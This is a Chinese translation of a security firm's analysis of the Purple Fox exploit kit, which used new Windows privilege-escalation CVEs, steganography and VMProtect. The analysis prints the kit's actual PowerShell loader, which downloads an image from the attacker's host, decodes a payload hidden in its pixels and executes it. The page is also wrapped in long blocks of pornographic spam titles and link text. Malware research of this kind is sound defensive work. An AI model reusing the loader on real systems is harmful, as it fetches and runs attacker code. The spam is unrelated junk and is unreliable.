精品欧美一区二区三区在线观看 _久久久久国色av免费观看性色_国产精品久久在线观看_亚洲第一综合网站_91精品又粗又猛又爽_小泽玛利亚一区二区免费_91亚洲精品国偷拍自产在线观看 _久久精品视频在线播放_美女精品久久久_欧美日韩国产成人在线

Purple Fox攻擊流程中增加了新的CVE、隱寫術和虛擬化技術

安全
Purple Fox屬于一種下載型木馬,能夠在感染目標計算機后下載其他惡意軟件,如加密貨幣挖礦惡意軟件。用戶一旦被感染,就將面臨各種各樣的威脅。

[[348952]]

Purple Fox屬于一種下載型木馬,能夠在感染目標計算機后下載其他惡意軟件,如加密貨幣挖礦惡意軟件。用戶一旦被感染,就將面臨各種各樣的威脅。

研究人員最近發現攻擊者利用Purple Fox攻擊工具包攻擊易受攻擊的Internet Explorer版本的次數激增。

調查顯示,Purple Fox反復嘗試通過公開可用的漏洞利用代碼,包括使用兩個最新的CVE-CVE-2020-1054和CVE-2019-0808。

此外,我們注意到他們的攻擊流程發生了其他變化,這些變化使他們可以采用隱寫術并通過代碼虛擬化技術覆蓋惡意代碼,從而更好地規避防火墻保護和某些檢測工具。

在最近幾年中,Purple Fox改進了其攻擊和傳播方法。它最初在2018年9月被發現,Purple Fox在2019年放棄使用NSIS(Nullsoft腳本可安裝系統)和Rig漏洞利用工具包,而是采用PowerShell來實現無文件執行。今年早些時候,ProofPoint詳細介紹了Purple Fox如何將CVE-2020-0674和CVE-2019-1458添加到其武器庫中。研究表明,Purple Fox已再次進行了迭代,添加了更多CVE以實現特權升級,并采用隱寫和虛擬化技術來避免檢測和妨礙安全人員分析。

有效載荷傳播流程

 

 在我們觀察到的攻擊中,通過廣告或僅通過單擊錯誤的URL將受害者定向到惡意站點。攻擊者將他們的惡意軟件托管在speedjudgmentacceleration[.]com上,并針對Internet Explorer用戶發起攻擊。

該漏洞利用VBScript代碼作為命令行運行mshta.exe,然后運行PowerShell。 PowerShell代碼從http[:]//rawcdn[.]githack[.]cyou/up.php?key=1下載并在內存中執行下一階段的代碼。

 

下一階段將遵循與以前版本的Purple Fox類似的模式,首先檢查它是否以管理員權限運行。如果是這樣,它將直接從攻擊者的站點安裝key = 2的MSI軟件包。否則,它會嘗試幾種不同的“本地特權升級”漏洞來首先提升。

新特權升級漏洞

在最新版本的Purple Fox中,攻擊者改進了兩點。

過去,Purple Fox會下載使用圖像文件擴展名(update.jpg)的本地特權升級(local privilege escalation, LPE)二進制文件,但它實際上是一個常規的可執行文件。適當的防火墻規則或安全軟件可以很容易地檢測到這種技術是惡意的。

現在,新版本的漏洞利用工具包將下載實際的映像文件(key = 3和key = 4),并使用隱寫術將每個LPE嵌入映像中。下面是一個使用的圖像示例:

[[348953]] 

 下載后,將其提取到內存中。以下代碼用于解碼和運行有效載荷:

  1. $uyxQcl8XomEdJUJd='sal a New-Object;Add-Type -A System.Drawing;$g=a System.Drawing.Bitmap((a Net.WebClient).OpenRead("http[:]//rawcdn[.]githack[.]cyou/up.php?key=3"));$o=a Byte[] 589824;(0..575)|%{foreach($x in(0..1023)){$p=$g.GetPixel($x,$_);$o[$_*1024+$x]=([math]::Floor(($p.B-band15)*16)-bor($p.G -band 15))}};IEX([System.Text.Encoding]::ASCII.GetString($o[0..589362]))' 
  2.  
  3. IEX ($uyxQcl8XomEdJUJd) 

此外,現在正在利用兩個新的漏洞來幫助提升本地特權:CVE-2020-1054和CVE-2019-0808。兩者都是Win32k組件中的內核漏洞。 CVE-2020-1054于今年5月進行了修補。我們發現利用這些漏洞的攻擊者二進制文件分別在2020年8月11日和2020年9月10日進行了編譯。

該漏洞利用程序包含調試信息和大量信息字符串。例如,CVE-2020-1054上的調試路徑為:

  1. D:\Personal\Windows\Windows10\Desktop\CVE-2020-1054-master\CVE-2020-1054-master\x64\Release\CVE-2020-1054.pdb 

從編譯時的文件夾名稱可以看出,該代碼來自Git存儲庫。我們能夠快速將漏洞利用追溯到以下公共存儲庫:CVE-2020-1054,CVE-2019-0808。

不幸的是,到目前為止,在野外還沒有尋找到更多具有類似特征的二進制文件。

值得注意的是,所有的腳本都檢查HKCU\Software\7-Zip下一個特定且一致的注冊表值“StayOnTop”,設置此值似乎使惡意軟件能夠確定有效載荷是否成功運行。因此,在計算機注冊表中找到該值就可以表示Purple Fox做出了哪些攻擊。

Rootkit有效載荷

PowerShell腳本和特權升級利用的目的最終是在計算機上安裝rootkit。如何釋放有效載荷和Rootkit組件

趨勢科技表示,早期版本的“紫狐貍”使用了msi.dll的MsiInstallProductA 函數來下載并執行其有效載荷——一個.msi文件,其中包含加密的shellcode以及32位和64位版本的有效載荷。

一旦執行,它將重新啟動計算機并使用PendingFileRenameOperations注冊表(負責存儲操作系統重新啟動時將重命名的文件的名稱)以重命名其組件。

在重新啟動計算機后,它將使用其Rootkit功能(隱藏其文件和注冊表項)創建一個掛起的svchost進程并注入一個DLL,然后創建一個具有Rootkit功能的驅動程序。

在執行有效載荷之前,它還會在注入的DLL中設置以下內容:驅動程序文件(dump_ {random hex} .sys)——負責Rootkit功能,主組件是一個DLL文件(Ms {random hex} App.dll)。

然而,與早期版本不同,新版本“紫狐貍”選擇了使用開源代碼來啟用其Rootkit組件,包括隱藏并保護其文件和注冊表項。同樣值得注意的是,新版本“紫狐貍”還會使用一個文件實用程序軟件來隱藏其DLL組件,這阻止了逆向工程或破解嘗試。

但是,鑒于技術迭代帶來的變化,我們想檢查有效載荷方面是否還有任何新的發展。

我們在新域中找到了兩個版本的惡意軟件,它們都是rootkit的MSI安裝程序,其中一個丟失了文件。

安裝過程大致相同,重啟后,我們仍然看到使用PendingFileRenameOperations將文件放置在system32目錄下。然而,在MSI包中的CustomAction表有vbscript代碼,運行以下內容:

 Purple Fox攻擊流程中增加了新的CVE、隱寫術和虛擬化技術

 有趣的是,這些命令直接來自微軟有關如何防御CVE-2020-0674漏洞(Internet Explorer RCE)的咨詢,該漏洞被Purple Fox使用來獲得初始訪問權限。我們推測保護新感染的計算機不受該漏洞的影響可能是為了阻止競爭對手。

從MSI軟件包中提取惡意軟件后,我們注意到有效載荷還具有一項重要的新功能,不過它現在受VMProtect保護。

從PE的分區表中可以輕松觀察到VMProtect的使用:

Purple Fox攻擊流程中增加了新的CVE、隱寫術和虛擬化技術

 “.vmp%d” 部分中的入口點清楚地表明了VMProtect

由于采用多種技術來隱藏原始代碼并對其進行模糊處理,因此安全研究人員的逆向處理變得更加困難了。

解壓縮VMProtect

逆向VMProtected二進制文件時,有兩個主要障礙需要克服:打包數據和虛擬指令。

我們首先必須解壓縮二進制文件中的數據,為此,我們使用了強大的x64dbg并打開了文件。之后,我們在VirtualProtect函數的開始處放置一個斷點:

想要記錄對該函數的所有調用,就要在“Log Text”框中輸入: 

Purple Fox攻擊流程中增加了新的CVE、隱寫術和虛擬化技術 

VirtualProtect: lpAddress={a:[esp+4]}, dwSize={d:[esp+8]}, flNewProtect={x:[esp+C]} ;

運行它,直到它崩潰,給出如下輸出:

Purple Fox攻擊流程中增加了新的CVE、隱寫術和虛擬化技術

 可以看到數據可能被解壓縮到虛擬地址0x401000,因此我們要監控該地址,直到將數據寫入該地址為止。

重新啟動程序后,我們再次在VirtualProtect上放置一個斷點,并使該斷點命中八次。然后,我們將EIP設置為該地址,并使用x64dbg的內置Scylla插件轉儲二進制文件并修復其導入:

Purple Fox攻擊流程中增加了新的CVE、隱寫術和虛擬化技術

 這為我們提供了一個更小的,可調試的DLL文件,其中包含大量純文本字符串,以幫助我們調查惡意軟件。

DLL的代碼仍使用虛擬化的調用進行了模糊處理,但幸運的是,我們在字符串中找到了以下代碼:

Purple Fox攻擊流程中增加了新的CVE、隱寫術和虛擬化技術

 這類似于之前報告的rootkit版本,后者只是他們下載并編譯的公共rootkit。根據這些信息,我們推斷出他們并沒有實質性地升級rootkit的功能。

總結

Purple Fox開發工具包正在積極升級迭代中,正如我們自2018年9月以來以及在我們的研究中再次看到的那樣,惡意軟件開發者正在試圖繞過Microsoft補丁程序,以便針對那些組織和安全團隊利用公開的利用代碼而未能及時修補的漏洞。這個新的變種還通過采用隱寫術來隱藏LPE二進制文件,并利用商業軟件來保護其代碼不被分析,從而提高了其逃避檢測的能力。

 本文翻譯自:https://labs.sentinelone.com/purple-fox-ek-new-cves-steganography-and-virtualization-added-to-attack-flow/如若轉載,請注明原文地址。

 

責任編輯:姜華 來源: 嘶吼網
相關推薦

2022-02-10 10:52:09

網絡攻擊網絡安全漏洞

2021-02-02 16:34:12

useMemo性能優化函數

2021-04-08 20:48:00

Purple Fox惡意軟件Windows設備

2010-10-19 11:30:16

IT培訓

2022-05-30 16:19:40

惡意軟件僵尸網絡網絡攻擊

2022-03-08 18:07:59

漏洞CISA

2022-04-26 16:56:44

CISA漏洞攻擊

2009-01-12 16:25:40

電子郵件數據管理法規遵從

2023-11-20 18:28:37

2018-07-11 04:16:16

2024-04-16 11:49:08

2021-09-15 16:24:42

bot攻擊金融服務行業LexisNexis

2023-01-16 18:22:53

Discourse開源

2009-06-11 17:18:23

EJB3.1Singleton B

2012-04-30 20:44:55

2021-08-03 13:40:18

數字化

2021-08-30 07:45:45

網絡釣魚攻擊遠程工作

2022-08-08 10:42:39

物聯網物聯網技術

2015-10-19 17:36:19

MOST內核Linux

2021-07-28 10:27:00

惡意軟件云交付網絡攻擊
點贊
收藏

51CTO技術棧公眾號

国产欧美高清| 久久精品色综合| 一色屋精品亚洲香蕉网站| 91深夜福利视频| 精品少妇爆乳无码av无码专区| 亚洲小说春色综合另类电影| 天天综合网 天天综合色| 欧美激情www| 国产又粗又黄视频| 亚洲一级黄色| 亚洲欧美日韩爽爽影院| av在线网站免费观看| 无遮挡在线观看| 亚洲天堂精品在线观看| 久久www免费人成精品| 6—12呦国产精品| 99视频一区| 久久久91精品国产| 亚洲精品理论片| 日韩精品免费视频一区二区三区| 欧美午夜激情在线| 4444在线观看| 1024视频在线| 91啦中文在线观看| 91久久极品少妇xxxxⅹ软件| 国产精品乱码一区二区视频| 欧美国产激情| 色偷偷综合社区| 人妻 丝袜美腿 中文字幕| 国产欧美在线观看免费| 亚洲sss视频在线视频| 午夜啪啪免费视频| yw在线观看| 久久精品欧美日韩| 久草精品电影| 午夜免费福利视频| 精品一区二区免费| 国产精品av电影| 国产精品黄色大片| 国产综合久久| 中文字幕av一区中文字幕天堂 | 亚洲国产精品久久久久久| 爱豆国产剧免费观看大全剧苏畅| 国产精欧美一区二区三区蓝颜男同| 亚洲宅男天堂在线观看无病毒| 中文字幕剧情在线观看一区| 成人免费视频| 久久九九影视网| 欧美福利一区二区三区| 天堂在线视频网站| zzijzzij亚洲日本少妇熟睡| 91中文在线视频| 国产精品天天操| 国产在线视视频有精品| 国产欧美精品日韩精品| 一炮成瘾1v1高h| 精品一区二区三区免费毛片爱| 国产精品视频xxxx| 中国黄色一级视频| 捆绑调教美女网站视频一区| 国产精品爽爽ⅴa在线观看| 69亚洲精品久久久蜜桃小说| 米奇777在线欧美播放| 欧美一级黑人aaaaaaa做受| 欧美精品二区三区| 久久久久免费| 国产精品美女免费视频| 瑟瑟视频在线免费观看| 蜜桃av一区二区三区| 国产精品尤物福利片在线观看| 中文字幕久久网| 麻豆成人综合网| 成人免费福利在线| 国产成a人亚洲精v品无码| 国产精品白丝jk黑袜喷水| 超碰97国产在线| 午夜在线视频观看| 久久婷婷国产综合精品青草 | 深爱五月综合网| 亚洲乱码一区| 日韩激情视频在线播放| 精品无码人妻一区二区免费蜜桃| 超碰成人久久| 九九精品视频在线| 五月婷婷色丁香| 捆绑紧缚一区二区三区视频| 91精品国产高清久久久久久91裸体| 国产成人av免费看| 久久久久久久国产精品影院| 亚洲区一区二区三区| 1stkiss在线漫画| 欧美日韩视频免费播放| www.久久91| 国产日韩三级| 亚洲精品资源美女情侣酒店 | 成人在线丰满少妇av| 中文字幕日韩视频| 国产精品变态另类虐交| 秋霞影院一区二区| 国产精品免费一区二区三区观看| 九一国产在线| 亚洲美女区一区| 妞干网在线免费视频| 国产亚洲高清在线观看| 亚洲美女黄色片| 可以直接看的黄色网址| 久久国产高清| av噜噜色噜噜久久| 成a人v在线播放| 亚洲高清免费观看| 日本中文字幕观看| 美日韩中文字幕| 欧美激情免费看| 91亚洲国产成人久久精品麻豆| 99久久久久久99| 最近免费观看高清韩国日本大全| 依依综合在线| 精品少妇一区二区三区 | 大片网站久久| 1769国产精品| 亚洲精品第五页| 国产精品久久久久久久浪潮网站| 99热自拍偷拍| 亚洲综合色婷婷在线观看| 中文字幕日韩综合av| 国产精品免费精品一区| 成人性生交大片| 天天干天天色天天爽| 免费污视频在线一区| 日韩精品视频免费| 免费一级特黄特色大片| 国产一区二区三区蝌蚪| 亚洲精品高清视频| 欧美一区久久久| 亚洲精品福利资源站| 国产va在线播放| 国产一区二区三区综合| 一级做a爰片久久| 成人免费黄色| 中文字幕免费精品一区| 国产99免费视频| 久久久影视传媒| 日本一区二区黄色| 啄木系列成人av电影| 91精品国产777在线观看| 国产 欧美 自拍| 一级女性全黄久久生活片免费| 午夜啪啪小视频| 国产精品久久久久久麻豆一区软件 | 欧美成人精品免费| a一区二区三区亚洲| 日韩在线小视频| 91精品国产乱码久久久久| 国产精品久久久久永久免费观看 | 久久av免费一区| 超碰91在线观看| 亚洲精品久久久久久久久久久| 国产午夜视频在线| 不卡一区二区中文字幕| 青草青青在线视频| 另类尿喷潮videofree| 2020久久国产精品| 国产一区二区三区福利| 欧美在线免费观看视频| 国产午夜精品福利视频| 久久精品国产精品亚洲精品| 26uuu成人| 在线日韩成人| 性色av一区二区三区免费| 天堂av在线免费| 在线观看www91| 一区二区三区四区五区| 成人在线视频一区二区| 尤物av无码色av无码| 欧美在线免费看视频| 成人黄色免费网站在线观看| 性直播体位视频在线观看| 亚洲激情久久久| 亚洲 欧美 日韩 在线| 中文字幕日韩精品一区| 国产女主播在线播放| 日韩精品国产精品| 一道本在线观看视频| 久久97精品| 日韩av电影在线播放| 黄色的网站在线观看| 亚洲国产精品久久久久秋霞不卡| 日韩av电影网址| 中文字幕的久久| www.555国产精品免费| 日韩国产在线一| 永久免费网站视频在线观看| 亚洲va久久| 1区1区3区4区产品乱码芒果精品| 阿v视频在线| 视频在线一区二区| 无码国产精品一区二区色情男同| 色播五月激情综合网| 国产精品久久久久久久精| 久久婷婷国产综合国色天香| www.色就是色.com| 香蕉久久a毛片| 亚洲天堂第一区| 精品国产日韩欧美| 国产乱码精品一区二区三区卡 | 黄色大片在线播放| 亚洲免费电影一区| 亚洲精品久久久久久无码色欲四季| 91国内精品野花午夜精品| 久久久久久久久久91| 国产精品麻豆视频| 三级网站在线免费观看| 国产凹凸在线观看一区二区 | 丁香另类激情小说| 91亚洲精品久久久蜜桃借种| 久久久久99| 18岁网站在线观看| 午夜精品婷婷| 中国一区二区三区| 欧洲乱码伦视频免费| 精品无人区一区二区三区竹菊| 久久gogo国模啪啪裸体| 国产精品美腿一区在线看| 亚洲黄色网址| 国内精品久久久久| 污视频在线看网站| 久久精品99久久久久久久久| 成人一区二区不卡免费| 亚洲另类欧美自拍| 无码精品人妻一区二区| 欧美r级在线观看| 亚洲精品中文字幕成人片 | 国产成人免费91av在线| av中文资源在线资源免费观看| 欧美成人免费大片| 最新av在线播放| 久久久极品av| 黄网站在线免费看| 久热在线中文字幕色999舞| 亚洲搞黄视频| 日韩最新免费不卡| 天堂а√在线官网| 两个人的视频www国产精品| 淫片在线观看| 日韩一区二区三区国产| 日本免费视频在线观看| 超碰日本道色综合久久综合| 老司机精品影院| 久久成人免费视频| 影音先锋中文在线视频| 欧美大片大片在线播放| 日本aa在线| 国内自拍欧美激情| segui88久久综合9999| 91精品国产777在线观看| 亚洲色图官网| 国产精品福利网站| 精品三级在线| 亚洲最大av网站| aiss精品大尺度系列| 国产主播一区二区三区四区| 日韩成人午夜| 日产精品久久久一区二区| 日韩欧美综合| 国产日韩第一页| 亚洲国产片色| 国产又大又硬又粗| 蜜臀av一区二区在线免费观看 | www.日本少妇| 国产日韩欧美三级| 一区二区三区视频在线观看免费| 九九九久久久精品| 北京富婆泄欲对白| 久久久久久久久久久黄色| www.4hu95.com四虎| 亚洲色图制服诱惑| 日韩成人一区二区三区| 在线观看日韩高清av| 国产视频一区二区三| 亚洲第一免费播放区| 国产三级在线免费观看| 美女少妇精品视频| 伊人久久av| 成人精品视频99在线观看免费| 日韩精品亚洲专区在线观看| 久久精品日韩| 97精品97| 免费在线观看亚洲视频| 美女一区二区视频| 四虎成人免费视频| 国产精品丝袜一区| 国产稀缺真实呦乱在线| 欧美少妇xxx| 天堂中文在线看| 色老头一区二区三区| 国模私拍一区二区国模曼安| 国产精品揄拍一区二区| 日韩av影院| 超碰10000| 日本伊人色综合网| 欧美肉大捧一进一出免费视频 | 亚洲乱码一区av黑人高潮| 三级外国片在线观看视频| 久久久久久91| 先锋影音网一区二区| 六十路精品视频| 欧美三级黄美女| 激情综合网婷婷| 北岛玲一区二区三区四区| 美女视频久久久| 一本到不卡精品视频在线观看| 亚洲爱情岛论坛永久| 中文字幕精品av| 成人va天堂| 精品视频第一区| 国产真实久久| 无套白嫩进入乌克兰美女| 国产偷国产偷精品高清尤物| 日本一区二区三区免费视频| 在线综合亚洲欧美在线视频| 福利在线观看| 国产91成人video| 91精品国产自产在线丝袜啪| 亚洲欧洲一区二区福利| 久久精品一本| 亚洲国产果冻传媒av在线观看| 亚洲欧美区自拍先锋| 无码人妻精品一区二| 日韩精品视频观看| 亚洲妇女成熟| 久久亚洲高清| 亚洲一卡久久| 亚洲av成人片色在线观看高潮| 一区二区三区在线视频观看 | 精品国产乱码91久久久久久网站| 免费黄色在线看| 国产裸体写真av一区二区| 日韩成人三级| 8x8x最新地址| 中文字幕av不卡| 最近中文字幕在线观看视频| 亚洲天堂男人天堂| 欧美xxxx做受欧美护士| 日韩精品一区二区三区丰满| 久热re这里精品视频在线6| 国产美女喷水视频| 色999日韩国产欧美一区二区| 日本一二三区在线视频| 欧美综合在线观看| 精品国产一区一区二区三亚瑟| 波多野结衣家庭教师视频| 久久在线观看免费| 波多野结衣大片| 日韩中文在线中文网三级| 成人午夜888| 欧美性潮喷xxxxx免费视频看| 国产不卡一区视频| 日韩精品无码一区二区| 亚洲欧美在线看| 久久久久久久性潮| 大地资源网在线观看免费官网| 国产精品影视网| 日韩精品乱码久久久久久| 亚洲人永久免费| 91精品国产一区二区在线观看| 无码人妻精品一区二区蜜桃百度| 国产成人免费网站| 91国产丝袜播放在线| 亚洲欧美国产精品va在线观看| 日本综合视频| 最新av在线免费观看| 成人av一区二区三区| 日本中文字幕在线| 中文字幕日韩欧美在线| 深夜福利一区| 91免费视频网站在线观看| 国产精品久久久久婷婷二区次| 国产三级视频在线播放| 欧美激情一区二区三级高清视频| 色综合www| www.亚洲高清| 亚洲国产成人av网| 搞黄视频在线观看| 91久久爱成人| 视频在线观看91| 久久免费在线观看视频| 亚洲香蕉av在线一区二区三区| 精品中文视频| 久久久精品在线视频| 亚洲天堂2016| 欧美女优在线| 亚洲自拍高清视频网站| 亚洲制服av| 2021亚洲天堂| 亚洲老司机av| 成人h动漫免费观看网站| 亚洲欧美日韩一级| 亚洲高清三级视频| 国产在线1区| 欧美高清视频一区|